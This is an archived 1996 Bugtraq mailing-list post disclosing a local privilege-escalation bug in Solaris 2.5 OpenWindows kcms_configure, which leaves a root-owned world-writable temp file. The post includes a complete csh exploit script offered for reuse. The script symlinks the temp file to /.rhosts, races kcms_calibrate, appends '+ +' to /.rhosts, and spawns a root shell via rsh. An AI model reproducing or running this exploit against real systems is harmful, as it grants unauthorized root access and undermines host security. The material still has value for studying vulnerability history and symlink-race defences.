From proff Fri Jul 26 14:24:22 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id OAA09744 for best-of-security; Fri, 26 Jul 1996 14:24:22 +1000
Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id HAA23860 for ; Fri, 26 Jul 1996 07:35:46 +1000
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <24855-24742>; Thu, 25 Jul 1996 17:33:57 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id RAA15085; Thu, 25 Jul 1996 17:27:16 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 194695 for BUGTRAQ@NETSPACE.ORG; Thu, 25 Jul 1996 17:19:57 -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id RAA13683 for ; Thu, 25 Jul 1996 17:08:04 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from cosmos.kaist.ac.kr (cosmos.kaist.ac.kr [143.248.172.41]) by netspace.org (8.7/8.6.12) with SMTP id PAA05773 for ; Thu, 25 Jul 1996 15:43:06 -0400
Received: (from beren@localhost) by cosmos.kaist.ac.kr (8.6.12h2/8.6.12) id EAA05783 for bugtraq@netspace.org; Fri, 26 Jul 1996 04:37:10 -0900
X-Mailer: ELM [version 2.4 PL21-h4]
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-2022-kr
Content-Transfer-Encoding: 7bit
Approved-By: Jungseok Roh
Message-ID: <199607261337.EAA05783@cosmos.kaist.ac.kr>
Date: Fri, 26 Jul 1996 04:37:10 -0900
Reply-To: Bugtraq List
Sender: proff
From: Jungseok Roh
Subject: Zolaris 2.5 Exploited.
To: Multiple recipients of list BUGTRAQ

Wow.. I got a chance to use an Ultra Sparc which runs Zolaris 2.5 several days ago ~ then one of my seniors told me that there might be a funny, also UNCONCEIVABLE, bug in Openwindows.. I trusted him... and I traversed the file system under /usr/openwin .. there were just four SUIDed files .. ( if Admin installed openwin packages ) xlock , ff.core , kcms* ..
Problem made less vague: kcms_calibrate , kcms_configure are the objects we are approaching. When examining the kcms family I found a funny thing. kcms_configure makes a temporary(?) file in /tmp whose permission bits are 666 ( Wow The sign of the Devil ),, and root definitely owns it.. ITS NAME is Kp_kcms_sys.sem !... Then all u guys know the next procedure is . hk.. I can't show u the whole procedure right now. 'Cause my Zolaris machine is "Network Unreachable ...". One odd thing is that exploitation succeeds when it interacts with kcms_calibrate!! The major procedure is making the temporary file which is linked to /.rhosts, then while kcms_configure tries to write /.rhosts make Thunder roll using kcms_calibrate and make its power Powerful.. puha.. it's like seeing Back To the Future III... then kcms_configure succeeds in its operation . I made a simple script exploiting the machine which has that fatal bug. hmm..but I can't erase one curiosity .. Why did Sun make this humble mistake ? ... plz somebody notify SUN of this bug. I don't know Her E-mail Address .. :)

(what a simple!!) script follows . this script shows u just the PROCEDURE .. re-make on your demands .

cat > uhit.sh << E_O_F
#!/bin/csh
# JungSeok. Roh ( beren@cosmos.kaist.ac.kr )
# Junior in KAIST undergraduate. Under Management Dep .
set disp="cosmos.kaist.ac.kr:0.0"
setenv DISPLAY $disp
/bin/rm -rf /tmp/Kp_kcms_sys.sem
cd /tmp
# Making symbolic link
ln -s /.rhosts Kp_kcms_sys.sem
/usr/openwin/bin/kcms_calibrate &
while (1)
    echo "Click the device you've chosen in kcms_calibrate window"
    # Choose Any profiles .. hk..
    # My 2.5 machine is unreachable so I can't get the exact name of that profile.
    # What a fool I am.. jjap..
    /usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon
    if ( -f /.rhosts ) then
        echo -n "+ +" >> /.rhosts
        # As u know , we can't login as root .. use the smtp account. that has UID 0 !!
        /usr/bin/rsh localhost -l smtp csh -i
    endif
end
E_O_F

__
There was a Legendary Security Task Force team whose name is K/U/S .. But it was BLOWN up by the KOREAN National Prosecutor.. I hate them !! ....... They make me so sad .... Laughin' in bitter tears ... hk..hk..

JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400